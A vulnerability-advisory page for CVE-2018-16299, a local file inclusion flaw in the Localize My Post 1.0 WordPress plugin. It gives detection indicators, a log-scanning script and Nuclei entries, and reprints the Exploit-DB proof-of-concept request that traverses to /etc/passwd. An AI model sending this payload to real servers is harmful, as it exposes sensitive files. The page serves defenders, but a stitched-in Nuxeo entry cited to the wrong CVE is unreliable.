CVE-2018-16299
Published 2018-09-24
CVE-2018-16299: The Localize My Post plugin 1.0 for WordPress allows Directory Traversal via the ajax/include.php file parameter.
Priority P265 · high · 7.5 CVSS 3.0
AV:N AC:L PR:N UI:N S:U C:H I:N A:N
EXPLOIT
EPSS: 43.72% (98.6th percentile)
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| localize_my_post_project | localize_my_post | — | — |
Detection & IOCs
url: /wp-content/plugins/localize-my-post/ajax/include.php?file=../../../../../../../../../../etc/passwd
- Look for GET requests to ajax/include.php with a 'file' parameter containing directory traversal sequences (../../) targeting /etc/passwd or other sensitive files.
- The vulnerable parameter 'file' is passed directly to PHP include() without sanitization; match on HTTP responses containing 'root:.*:0:0:' to confirm successful LFI exploitation.
- The exploit requires HTTP/1.0 protocol version to interact with the application; flag anomalous HTTP/1.0 requests to the plugin path.
- Vulnerability is specific to Localize My Post plugin version 1.0 for WordPress only; later versions are not confirmed affected.
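The request-side checks above can be run over web server access logs. The following is an added example, not code from the advisory or the plugin: it assumes combined-format log lines, and the sample lines, the `map.php` value and the function names are constructed for illustration. It goes slightly beyond the literal `../` match by undoing nested percent-encoding and backslash separators before testing the `file` value.

```python
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Endpoint path taken from the advisory; the rest is this example's assumption.
PLUGIN_PATH = "/wp-content/plugins/localize-my-post/ajax/include.php"
# Request field of a combined-format log line: "METHOD target HTTP/x.y".
# The version is optional because the PoC request on this page omits it.
REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+)(?: HTTP/(?P<ver>[\d.]+))?"')

# Constructed sample lines (not from the page).
SAMPLE_LOG = [
    '203.0.113.5 - - [19/Sep/2018:10:00:00 +0000] "GET /wordpress/wp-content/plugins/localize-my-post/ajax/include.php?file=../../../../etc/passwd HTTP/1.0" 200 1432',
    '203.0.113.5 - - [19/Sep/2018:10:00:02 +0000] "GET /wp-content/plugins/localize-my-post/ajax/include.php?file=%252e%252e%252f%252e%252e%252fetc%252fpasswd HTTP/1.1" 200 1432',
    '198.51.100.7 - - [19/Sep/2018:10:01:00 +0000] "GET /wp-content/plugins/localize-my-post/ajax/include.php?file=map.php HTTP/1.1" 200 512',
    '198.51.100.7 - - [19/Sep/2018:10:01:05 +0000] "GET /index.php?file=../x HTTP/1.1" 404 0',
]


def fully_decode(value, max_rounds=3):
    """Undo nested percent-encoding (%252e -> %2e -> .) a bounded number of times."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def classify(log_line):
    """Return None for lines that do not hit the plugin endpoint, else a finding dict."""
    m = REQUEST_RE.search(log_line)
    if not m:
        return None
    url = urlsplit(m["target"])
    if not fully_decode(url.path).lower().endswith(PLUGIN_PATH):
        return None
    # parse_qs decodes once; fully_decode removes any remaining encoding layers.
    files = parse_qs(url.query, keep_blank_values=True).get("file", [])
    decoded = [fully_decode(v).replace("\\", "/") for v in files]
    traversal = any(".." in v.split("/") or v.startswith("/") for v in decoded)
    return {"file": decoded, "traversal": traversal, "http10": m["ver"] == "1.0"}


if __name__ == "__main__":
    for line in SAMPLE_LOG:
        print(classify(line))
```

Because the plugin reads `$_REQUEST['file']`, a value sent in a request body does not appear in the access-log request line; covering that case, and the `root:.*:0:0:` response match, needs inspection at a WAF or proxy that sees bodies.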
CVSS provenance
nvd · v3.0 · 7.5 HIGH · CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
nvd · v2.0 · 5.0 MEDIUM · AV:N/AC:L/Au:N/C:P/I:N/A:N
No detection rules found.
Exploit-DB
WordPress Plugin Localize My Post 1.0 - Local File Inclusion
exploitdb·2018-09-19
CVE-2018-16299 WordPress Plugin Localize My Post 1.0 - Local File Inclusion
---
# Exploit Title: WordPress Plugin Localize My Post 1.0 - Local File Inclusion
# Author: Manuel Garcia Cardenas
# Date: 2018-09-19
# Software link: https://es.wordpress.org/plugins/localize-my-post/
# CVE: 2018-16299
# DESCRIPTION
# This bug was found in the file: /localize-my-post/ajax/include.php
# include($_REQUEST['file']);
# The parameter "file" is not sanitized, allowing the inclusion of local files
# To exploit the vulnerability, it is only necessary to use version 1.0 of the HTTP protocol to interact with the application.
# Local File Inclusion POC:
GET /wordpress/wp-content/plugins/localize-my-post/ajax/include.php?file=../../../../../../../../../../etc/passwd
Nuclei
Nuxeo <10.3 - Remote Code Execution
nuclei·CVSS 7.5
CVE-2018-16341 [HIGH] Nuxeo <10.3 - Remote Code Execution
Nuxeo prior to version 10.3 is susceptible to an unauthenticated remote code execution vulnerability via server-side template injection.
Template:
id: CVE-2018-16341
info:
  name: Nuxeo <10.3 - Remote Code Execution
  author: madrobot
  severity: high
  description: |
    Nuxeo prior to version 10.3 is susceptible to an unauthenticated remote code execution vulnerability via server-side template injection.
  impact: |
    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected system.
  remediation: |
    Upgrade Nuxeo to version 10.3 or later to mitigate this vulnerability.
  reference:
    - https://nvd.nist.gov/vuln/detail/CVE-2018-16299
  classification:
    cve-id: CVE-2018-16341
  metadata:
    max-request: 1
  tags: cve,cve2018,nux
Nuclei
WordPress Localize My Post 1.0 - Local File Inclusion
nuclei·CVSS 7.5
CVE-2018-16299 [HIGH] WordPress Localize My Post 1.0 - Local File Inclusion
WordPress Localize My Post 1.0 is susceptible to local file inclusion via the ajax/include.php file parameter.
Template:
id: CVE-2018-16299
info:
  name: WordPress Localize My Post 1.0 - Local File Inclusion
  author: 0x_Akoko,0x240x23elu
  severity: high
  description: |
    WordPress Localize My Post 1.0 is susceptible to local file inclusion via the ajax/include.php file parameter.
  impact: |
    An attacker can exploit this vulnerability to read sensitive files on the server.
  remediation: |
    Update to the latest version of WordPress Localize My Post plugin.
  reference:
    - https://www.exploit-db.com/exploits/45439
    - https://packetstormsecurity.com/files/149433/WordPress-Localize-My-Post-1.0-Local-File-Inclusion.html
    - https://github.com/julianburr/w
- http://seclists.org/fulldisclosure/2018/Sep/33
- https://github.com/julianburr/wp-plugin-localizemypost/issues/1
- https://packetstormsecurity.com/files/149433/WordPress-Localize-My-Post-1.0-Local-File-Inclusion.html
- https://www.exploit-db.com/exploits/45439/
2018-09-24
Published